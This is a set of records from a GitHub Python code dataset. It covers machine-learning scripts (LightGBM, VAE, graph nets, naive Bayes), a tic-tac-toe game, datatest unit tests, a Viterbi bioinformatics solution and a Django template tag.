yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), position=\"right\", ),\r\n )\r\n\r\n )\r\n return line\r\n\r\n","repo_name":"xingweihappyer/credit-card","sub_path":"lgbm_tuner.py","file_name":"lgbm_tuner.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
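The hand-rolled loops in grid_search above can be replaced by sklearn's GridSearchCV, which the file already hints at in a commented-out snippet; a minimal sketch assuming the same LGBMClassifier and a reduced grid:

from lightgbm import LGBMClassifier
from sklearn.model_selection import GridSearchCV

param_grid = {
    'num_leaves': [15, 31, 63],
    'max_depth': [3, 4, 5],
    'learning_rate': [0.01, 0.05, 0.1],
}
search = GridSearchCV(LGBMClassifier(objective='binary', random_state=7),
                      param_grid, scoring='roc_auc', cv=4)
# search.fit(x_train, y_train)  # then inspect search.best_params_ / search.best_score_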
+{"seq_id":"40309053165","text":"from print_board import *\nfrom random import randrange\nfrom functools import partial\ntext = partial(print, sep='', end=\"\\n\\n\")\n\ndef play(board, turn, u_icon, b_icon, round, bot):\n\n choice = ''\n\n print_board(board, round)\n\n if turn == \"user\":\n\n good = False\n while not good:\n good = True\n text(bot,\": Your turn! Which place (0-8) would you like to play?\")\n choice = input(\"--> \")\n if choice not in board or (choice == 'X' or choice == 'O' or not choice):\n text(bot,\": That's not an option, sorry.\")\n good = False\n\n board[board.index(choice)] = u_icon\n \n else:\n \n while choice not in board: # while choice is not an option\n choice = str(randrange(0,8)) # generate choice (0-8)\n text(bot,\": My turn! I'll pick... \",choice,\"!\")\n\n board[board.index(choice)] = b_icon\n\n return check_for_win(board)\n\ndef check_for_win(board):\n\n # check for horizontal win\n i = 0\n while i < 9: # look through rows 0-2, 3-5, and 6-8\n if board[i] == board[i + 1] and board[i] == board[i + 2]:\n return board[i]\n i += 3\n\n # check for vertical win\n i = 0\n while i < 3: # look through columns 0;3;6, 1;4;7, and 2;5;8\n if board[i] == board[i + 3] and board[i] == board[i + 6]:\n return board[i]\n i += 1\n\n # check for diagonal win\n if board[0] == board[4] and board[0] == board[8]:\n return board[0]\n elif board[2] == board[4] and board[2] == board[6]:\n return board[2]\n\n for b in board:\n if b is not 'X' and b is not 'O':\n return '' # return blank if no winner yet and there are still open spaces\n\n return 'C' # return C if no winner yet and there are NOT still open spaces","repo_name":"meganmcadams/tik-tac-toe","sub_path":"Sources/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"7021341509","text":"# -*- encoding: utf-8 -*-\n'''\n@Author : {Yixu}\n@Contact : {xiyu111@mail.ustc.edu.cn}\n@Software: PyCharm\n@File : VAE_Genarate_face.py\n@Time : 6/11/2019 7:05 PM\n'''\n'''\nuse gan is not good,this time use vae,may use fullconnect to de\n'''\n\nfrom read_data import read_img\nfrom torch.utils.data import DataLoader\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nfrom torchvision.utils import save_image\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1,2,3,4,5\"\n\n\nclass VAE_net(torch.nn.Module):\n\tdef __init__(self):\n\t\tsuper(VAE_net, self).__init__() # jiche fathers Attribute\n\t\tlatent_size = 64\n\t\tn_channel = 3\n\t\tn_feature = 128\n\t\tLATENT_CODE_NUM = 64 # for VAE latne\n\n\t\tself.Decoder_net = nn.Sequential(nn.ConvTranspose2d(latent_size, 4 * n_feature, kernel_size=4, bias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(4 * n_feature), # input 64*1*1\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(4 * n_feature, 2 * n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(2 * n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(2 * n_feature, n_feature, kernel_size=4, padding=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbias=False),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature, n_feature // 2, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 2),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 2, n_feature // 4, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.BatchNorm2d(n_feature // 4),\n\t\t\t\t\t\t\t\t\t\t nn.LeakyReLU(),\n\t\t\t\t\t\t\t\t\t\t nn.ConvTranspose2d(n_feature // 4, n_channel, kernel_size=4, stride=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpadding=1),\n\t\t\t\t\t\t\t\t\t\t nn.Sigmoid(), # output 3*128*128\n\t\t\t\t\t\t\t\t\t\t ).cuda()\n\n\t\tself.Encoder_cal_u = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_o = nn.Linear(64 * 1 * 1, LATENT_CODE_NUM).cuda()\n\t\tself.Encoder_cal_add_u_o = nn.Linear(LATENT_CODE_NUM, 64 * 1 * 1).cuda() #???\n\n\t\tself.Encoder_net = nn.Sequential(\n\t\t\tnn.Conv2d(n_channel, n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(n_feature), # input 128*128*3\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1, bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 4 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(4 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(4 * n_feature, 2 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(2 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(2 * n_feature, 1 * n_feature, kernel_size=4, stride=2, padding=1,\n\t\t\t\t\t bias=False),\n\t\t\tnn.BatchNorm2d(1 * n_feature),\n\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(1 * n_feature, LATENT_CODE_NUM, kernel_size=4), # output 64 * 1 * 1\n\t\t).cuda()\n\n\tdef reparameterize(self, mu, logvar):\n\t\teps = torch.randn(mu.size(0), mu.size(1)).cuda() #\n\t\tz = mu + eps * 
torch.exp(logvar / 2)\n\t\treturn z.cuda()\n\n\tdef forward(self, img):\n\t\tpred1, pred2 = self.Encoder_net(img), self.Encoder_net(img)\n\t\tmu = self.Encoder_cal_u(pred1.view(pred1.size(0), -1)) # get\n\t\tlogvar = self.Encoder_cal_o(pred2.view(pred2.size(0), -1)) # get\n\t\tz = self.reparameterize(mu, logvar)\n\t\tadd_u_o = self.Encoder_cal_add_u_o(z).view(z.size(0), 64, 1, 1)\n\t\toutput = self.Decoder_net(add_u_o) # get\n\t\treturn output.cuda(), mu.cuda(), logvar.cuda()\n\nvae = VAE_net()\n\nif torch.cuda.device_count() > 1:\n\tvae = nn.DataParallel(vae)\n\tvae = vae.cuda()\n\ndef loss_func(recon_x, x, mu, logvar):\n\t# BCE = F.binary_cross_entropy(recon_x, x, size_average=False)\n\t# KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\t# return BCE + KLD\n\tcriterion = torch.nn.MSELoss()\n\tl2_loss = criterion(recon_x, x)\n\tKLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\treturn l2_loss + KLD\n\n# Parallel Computing\n\noptimizer = torch.optim.Adam(vae.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\nif __name__ == '__main__':\n\tfile_dir = \"/home1/yixu/yixu_project/CVAE-GAN/download_script/download\"\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\tcuda = True if torch.cuda.is_available() else False\n\tTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # ????\n\tdata = read_img.get_file(file_dir)\n\tdata = data.to(device)\n\n\tdataloader = DataLoader(data, batch_size=64, shuffle=True)\n\n\n\t# for this time decoder is genarate\n\t# (self, in_channels, out_channels, kernel_size, stride=1,padding=0, output_padding=0, groups=1, bias=True,dilation=1, padding_mode='zeros'):\n\t# output=(input-1)*stride+output_padding -2*padding+kernel_size\n\n\t# not same as up\n\t# output=(input-kernel_size+2*Padding)/stride + 1\n\n\tdef weights_init(m):\n\t\tif type(m) in [nn.ConvTranspose2d, nn.Conv2d]:\n\t\t\tnn.init.xavier_normal_(m.weight)\n\t\telif type(m) == nn.BatchNorm2d:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\t\telif type(m) == nn.Linear:\n\t\t\tnn.init.normal(m.weight, 1.0, 0.02)\n\t\t\tnn.init.constant_(m.bias, 0)\n\n\n\t#\n\t#vae.Decoder_net.apply(weights_init)\n\t#vae.Encoder_net.apply(weights_init)\n\t#vae.Encoder_cal_add_u_o.apply(weights_init) # ???\n\t#vae.Encoder_cal_o.apply(weights_init)\n\t#vae.Encoder_cal_u.apply(weights_init)\n\n\tfixed_noise = torch.randn(64, 64, 1, 1).cuda() # fix it as one\n\tepoch_num = 4000\n\n\tfor epoch in range(epoch_num):\n\t\tfor batch_idx, data in enumerate(dataloader):\n\t\t\t# get data\n\t\t\timg = data.cuda()\n\t\t\tbatch_size = img.size(0)\n\t\t\ttotal_loss = 0\n\t\t\toptimizer.zero_grad()\n\t\t\trecon_img, mu, logvar = vae.forward(img)\n\n\t\t\tloss = loss_func(recon_img, img, mu, logvar)\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\tif batch_idx == 1:\n\t\t\t\t#fake_img = vae.Decoder_net(fixed_noise).cuda()\n\t\t\t\tfake_img = vae.module.Decoder_net(fixed_noise).cuda()\n\t\t\t\t# path = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE/images_epoch{:02d}_batch{:03d}.jpg'.format(epoch,batch_idx)\n\t\t\t\tpath = '/home1/yixu/yixu_project/CVAE-GAN/output_VAE_l2loss/images_epoch{:02d}_batch{:03d}.jpg'.format(\n\t\t\t\t\tepoch, batch_idx)\n\t\t\t\tsave_image(fake_img, path, normalize=True)\n\n\t\t\tprint('[{}/{}]'.format(epoch, epoch_num) +\n\t\t\t\t '[{}/{}]'.format(batch_idx, len(dataloader)) +\n\t\t\t\t 
'loss:{:g}'.format(loss))\n","repo_name":"MasterXiYu/CVAE-GAN","sub_path":"demo/VAE_Genarate_face.py","file_name":"VAE_Genarate_face.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"27946305433","text":"try:\n import ujson as json\nexcept BaseException:\n import json\nfrom .SerializerBase import SerializerBase\n\n\nclass SerializerUJson(SerializerBase):\n\n def dumps(self, obj, sort_keys=False, indent=False):\n return json.dumps(obj, ensure_ascii=False, sort_keys=sort_keys, indent=indent)\n\n def loads(self, s):\n if isinstance(s, bytes):\n s = s.decode('utf-8')\n return json.loads(s)\n","repo_name":"ahussein/core9","sub_path":"JumpScale9/data/serializers/SerializerUJson.py","file_name":"SerializerUJson.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39271514878","text":"import torch\nimport torch.nn as nn\n\nfrom modules.conv_layer import GraphConv\nfrom modules.attention import AttentionLayer\nimport pdb\n\n\nclass MolConvNet(nn.Module):\n def __init__(self, args, use_attn=False):\n super(MolConvNet, self).__init__()\n self.args = args\n self.use_attn = use_attn\n\n self.conv_layer = GraphConv(args)\n self.output_size = args.hidden_size\n\n if self.use_attn:\n self.attn_layer = AttentionLayer(args)\n self.output_size += args.hidden_size\n\n def forward(self, mol_graph, stats_tracker=None):\n graph_inputs, scope = mol_graph.get_graph_inputs()\n atom_h = self.conv_layer(graph_inputs)\n\n attn_context = None\n if self.use_attn:\n attn_context = self.attn_layer(atom_h, scope)\n if attn_context is not None:\n atom_h = torch.cat([atom_h, attn_context], dim=1)\n\n return atom_h\n","repo_name":"benatorc/PA-Graph-Transformer","sub_path":"models/mol_conv_net.py","file_name":"mol_conv_net.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"18"}
+{"seq_id":"18717421157","text":"\"\"\"Tests for normalization functions.\"\"\"\nimport sqlite3\nfrom . import _unittest as unittest\nfrom datatest.requirements import BaseRequirement\nfrom datatest._utils import IterItems\n\nfrom datatest._normalize import TypedIterator\nfrom datatest._normalize import _normalize_lazy\nfrom datatest._normalize import _normalize_eager\nfrom datatest._normalize import normalize\n\ntry:\n import squint\nexcept ImportError:\n squint = None\n\ntry:\n import pandas\nexcept ImportError:\n pandas = None\n\ntry:\n import numpy\nexcept ImportError:\n numpy = None\n\n\nclass TestNormalizeLazyUnchanged(unittest.TestCase):\n \"\"\"Test objects that should be returned unchanged.\"\"\"\n def test_nonexhaustible_iterable(self):\n data = [1, 2, 3]\n self.assertIs(_normalize_lazy(data), data)\n\n data = (1, 2, 3)\n self.assertIs(_normalize_lazy(data), data)\n\n def test_exhaustible_iterator(self):\n data = iter([1, 2, 3])\n self.assertIs(_normalize_lazy(data), data)\n\n def test_typediterator(self):\n data = TypedIterator(iter([1, 2, 3]), evaltype=tuple)\n self.assertIs(_normalize_lazy(data), data)\n\n\n@unittest.skipUnless(squint, 'requires squint')\nclass TestNormalizeLazySquint(unittest.TestCase):\n \"\"\"Test squint package's `Result` and `Query` objects.\"\"\"\n def test_sequence_result(self):\n result_object = squint.Result([1, 2, 3, 4], evaltype=list)\n normalized = _normalize_lazy(result_object)\n self.assertIs(normalized, result_object, msg='should return original object')\n\n def test_iteritems_result(self):\n result_object = squint.Result([('a', 1), ('b', 2)], evaltype=dict)\n normalized = _normalize_lazy(result_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_query_that_returns_sequence(self):\n query_object = squint.Query.from_object([1, 2, 3, 4])\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, squint.Result)\n self.assertEqual(normalized.evaltype, list)\n\n def test_query_that_returns_noncontainer(self):\n query_object = squint.Query.from_object([1, 2, 3, 4]).sum()\n normalized = _normalize_lazy(query_object)\n self.assertEqual(normalized, 10)\n\n def test_query_that_returns_mapping(self):\n query_object = squint.Query.from_object({'a': 1, 'b': 2})\n normalized = _normalize_lazy(query_object)\n self.assertIsInstance(normalized, IterItems)\n self.assertEqual(set(normalized), set([('a', 1), ('b', 2)]))\n\n def test_select(self):\n \"\"\"Select objects should not be changed by normalization.\"\"\"\n select_object = squint.Select([['A'], [1], [2], [3], [4]])\n normalized = _normalize_lazy(select_object)\n self.assertIsInstance(normalized, squint.Select)\n\n\n@unittest.skipUnless(pandas, 'requires pandas')\nclass TestNormalizeLazyPandas(unittest.TestCase):\n def test_dataframe_with_rangeindex(self):\n \"\"\"DataFrames using a RangeIndex should be treated as sequences.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(df)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_dataframe_with_otherindex(self):\n \"\"\"DataFrames using other index types should be treated as mappings.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(df)\n\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertIsInstance(result, 
IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiple_columns(self):\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), data)\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_single_column(self):\n \"\"\"Single column DataFrame values should be unwrapped.\"\"\"\n data = [('x',), ('y',), ('z',)]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), ['x', 'y', 'z'])\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n df = pandas.DataFrame(\n data=[('x',), ('y',), ('z',)],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n df = pandas.DataFrame([('x',), ('y',), ('z',)], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(df)\n\n def test_series_with_rangeindex(self):\n \"\"\"Series using a RangeIndex should be treated as sequences.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(s)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_series_with_otherindex(self):\n \"\"\"Series using other index types should be treated as mappings.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(s)\n\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_series_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n s = pandas.Series(\n data=['x', 'y', 'z'],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(s)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_series_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n s = pandas.Series(['x', 'y', 'z'], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(s)\n\n\n@unittest.skipUnless(numpy, 'requires numpy')\nclass TestNormalizeLazyNumpy(unittest.TestCase):\n def test_two_dimentional_array(self):\n arr = numpy.array([['a', 'x'], ['b', 'y']])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 'x'), ('b', 'y')])\n\n def test_two_valued_structured_array(self):\n arr = numpy.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_two_valued_recarray_array(self): # record array\n 
arr = numpy.rec.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_one_dimentional_array(self):\n arr = numpy.array(['x', 'y', 'z'])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_structured_array(self):\n arr = numpy.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_three_dimentional_array(self):\n \"\"\"Three-dimentional array normalization is not supported.\"\"\"\n arr = numpy.array([[[1, 3], ['a', 'x']], [[2, 4], ['b', 'y']]])\n result = _normalize_lazy(arr)\n self.assertIs(result, arr, msg='unsupported, returns unchanged')\n\n\nclass TestNormalizeLazyDBAPI2Cursor(unittest.TestCase):\n def setUp(self):\n conn = sqlite3.connect(':memory:')\n conn.executescript('''\n CREATE TABLE mydata(A, B, C);\n INSERT INTO mydata VALUES('x', 'foo', 20);\n INSERT INTO mydata VALUES('x', 'foo', 30);\n INSERT INTO mydata VALUES('y', 'foo', 10);\n INSERT INTO mydata VALUES('y', 'bar', 20);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n ''')\n self.cursor = conn.cursor()\n\n def test_multiple_coumns(self):\n self.cursor.execute('SELECT A, B FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(\n list(result),\n [('x', 'foo'), ('x', 'foo'), ('y', 'foo'),\n ('y', 'bar'), ('z', 'bar'), ('z', 'bar')],\n )\n\n def test_single_column(self):\n \"\"\"Single column selections should be unwrapped.\"\"\"\n self.cursor.execute('SELECT C FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(list(result), [20, 30, 10, 20, 10, 10])\n\n\nclass TestNormalizeEager(unittest.TestCase):\n def test_unchanged(self):\n \"\"\"For given instances, should return original object.\"\"\"\n requirement = [1, 2, 3]\n self.assertIs(_normalize_eager(requirement), requirement)\n\n class MyRequirement(BaseRequirement):\n def __init__(self):\n pass\n\n def __iter__(self):\n return iter([])\n\n def check_data():\n return None\n\n requirement = MyRequirement()\n self.assertIs(_normalize_eager(requirement), requirement)\n\n def test_exhaustible_type(self):\n with self.assertRaises(TypeError, msg='cannot use generic iter'):\n _normalize_eager(iter([1, 2, 3]))\n\n output = _normalize_eager(iter([1, 2, 3]), default_type=set)\n self.assertEqual(output, set([1, 2, 3]))\n\n @unittest.skipUnless(squint, 'requires squint')\n def test_squint_object(self):\n result_obj = squint.Result(iter([1, 2, 3]), evaltype=tuple)\n output = _normalize_eager(result_obj)\n self.assertIsInstance(output, tuple)\n self.assertEqual(output, (1, 2, 3))\n\n def test_iter_items(self):\n items = IterItems(iter([(0, 'x'), (1, 'y'), (2, 'z')]))\n output = _normalize_eager(items)\n self.assertIsInstance(output, dict)\n self.assertEqual(output, {0: 'x', 1: 'y', 2: 
'z'})\n","repo_name":"shawnbrown/datatest","sub_path":"tests/test_normalize.py","file_name":"test_normalize.py","file_ext":"py","file_size_in_byte":11655,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"18"}
+{"seq_id":"8833470864","text":"def compute_stop_positions():\r\n import math\r\n from math import sin\r\n\r\n Stop_positions = []\r\n Nsp = 0\r\n Psp=0\r\n cam_fov = 90 # in degrees\r\n rail_lenght = 100 #in meters\r\n max_obj_distance = 15 # in meters\r\n half_fov= cam_fov/2\r\n n = 90 - half_fov\r\n r = sin(math.radians(n))\r\n initial_pos = max_obj_distance * sin(math.radians(half_fov)) / sin(math.radians(n))\r\n\r\n r_initial_pos = round(initial_pos)\r\n Psp = r_initial_pos\r\n # print(r_initial_pos)\r\n Stop_positions.append(r_initial_pos)\r\n\r\n #print(Stop_positions)\r\n Nsp = r_initial_pos + 0.5*r_initial_pos\r\n Stop_positions.append(round(Nsp))\r\n\r\n #print(round(Nsp))\r\n while Nsp < rail_lenght:\r\n Psp = Nsp\r\n Nsp = Psp + round(0.5*Psp)\r\n if Nsp < rail_lenght:\r\n Stop_positions.append(round(Nsp))\r\n Psp += Nsp\r\n # print(Stop_positions)\r\n return Stop_positions\r\n\r\n#implement the movement\r\ncur_location = 0\r\nstop_pos = compute_stop_positions()\r\n\r\n\r\nfor position in stop_pos:\r\n cur_location = position\r\n if cur_location == position:\r\n #move camera to the position\r\n print(\"Camera is at \" + str(cur_location))\r\n # stop camera\r\n #take snap shot\r\n continue\r\n \r\n #","repo_name":"ubong-essien/Attendance-systemin-python","sub_path":"camera_control.py","file_name":"camera_control.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71180879721","text":"from nbc import *\nfrom vanilla import *\nfrom data import *\nfrom matplotlib import pyplot as plt\n\nif __name__ == \"__main__\":\n\n sizes = [1, 5, 10, 20, 25, 30, 40, 50, 60, 70, 80, 90, 99]\n losses = []\n nbc_losses = []\n maxIter = 2\n for size in sizes:\n X = load_data(\"yelp_cat.csv\")\n x1, x2 = split_data(X, size)\n save_split(x1, x2)\n X = load_data(\"train-set.csv\")\n Xt = load_data(\"test-set.csv\")\n\n nbc = NBC(X.as_matrix(), Xt.as_matrix())\n nbc.train()\n nbcloss = nbc.predict_test()\n nbc_losses.append(nbcloss)\n print(\"nbc ZERO-ONE LOSS=\" + str(nbcloss))\n\n y = X['goodForGroups'].as_matrix()\n yt = Xt['goodForGroups'].as_matrix()\n mergeDf = binarize(X, Xt)\n X, Xt = split_vector(mergeDf[0], mergeDf[1])\n nn = train(X, maxIter, y)\n loss = predict_batch(Xt, yt, nn)\n losses.append(loss)\n print(\"pcp ZERO-ONE LOSS=\" + str(loss))\n print(\"\")\n\n plt.plot(sizes, losses)\n plt.plot(sizes, nbc_losses)\n plt.xlabel(\"Training set size %\")\n plt.ylabel(\"Zero one loss\")\n plt.show()\n","repo_name":"exponentialbit1024/PurdueCS","sub_path":"CS373/shah255-hw4/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"31205383100","text":"def read_matrix_as_dict(arr):\n ans = {}\n for i in range(len(states)):\n line = [float(x) for x in f.readline().split()[1:]]\n for (ind, x) in enumerate(line):\n ans[(states[i], arr[ind])] = x\n return ans\n\n\ndef skip(n):\n for _ in range(n):\n f.readline()\n\n\ndef reverse_string(str):\n return ''.join(str[::-1])\n\n\nif __name__ == '__main__':\n with open('rosalind_ba10c.txt', 'r') as f:\n input_string = f.readline().rstrip()\n skip(1)\n abc = f.readline().split()\n skip(1)\n states = f.readline().split()\n skip(2)\n t_matrix = read_matrix_as_dict(states)\n\n skip(2)\n e_matrix = read_matrix_as_dict(abc)\n\n scores = {(0, state): e_matrix[state, input_string[0]] * 1 / len(states) for state in states}\n next_states = {(0, state): '' for state in states}\n last_char = None\n for (idx, ch) in enumerate(input_string[1:]):\n for state in states:\n max_next_score = None\n for next_state in states:\n temp = (scores[idx, next_state] * t_matrix[next_state, state], next_state)\n if max_next_score is None or max_next_score < temp:\n max_next_score = temp\n scores[idx + 1, state] = max_next_score[0] * e_matrix[state, ch]\n next_states[idx + 1, state] = max_next_score[1]\n if idx == len(input_string) - 2:\n temp = (scores[idx + 1, state], state)\n if last_char is None or temp > last_char:\n last_char = temp\n\n ans = str(last_char[1])\n for i in range(len(input_string) - 1, -1, -1):\n ans += next_states[i, ans[-1]]\n\n print(reverse_string(ans))\n","repo_name":"paskudnicc/Itmo","sub_path":"3 year/bioinf/ba10c.py","file_name":"ba10c.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11071066494","text":"# -*- coding: utf-8 -*-\n# @Author : xiaohao\n# @Email : 321459055@qq.com\n# @File : comment_block.py\n# @Software: PyCharm\n# @Time : 2020/7/31 17:08\n\n\nfrom django import template\n\nfrom apps.comment.form import CommentForm\nfrom apps.comment.models import Comment\n\nregister = template.Library()\n\n\n@register.inclusion_tag('block.html')\ndef comment_block(target):\n \"\"\"Removes all values of arg from the given string\"\"\"\n return {\n 'target': target,\n 'comment_form': CommentForm(),\n 'comment_list': Comment.get_by_target(target)\n }\n","repo_name":"xiaohaogit/blog","sub_path":"myblog/apps/comment/templatetags/comment_block.py","file_name":"comment_block.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
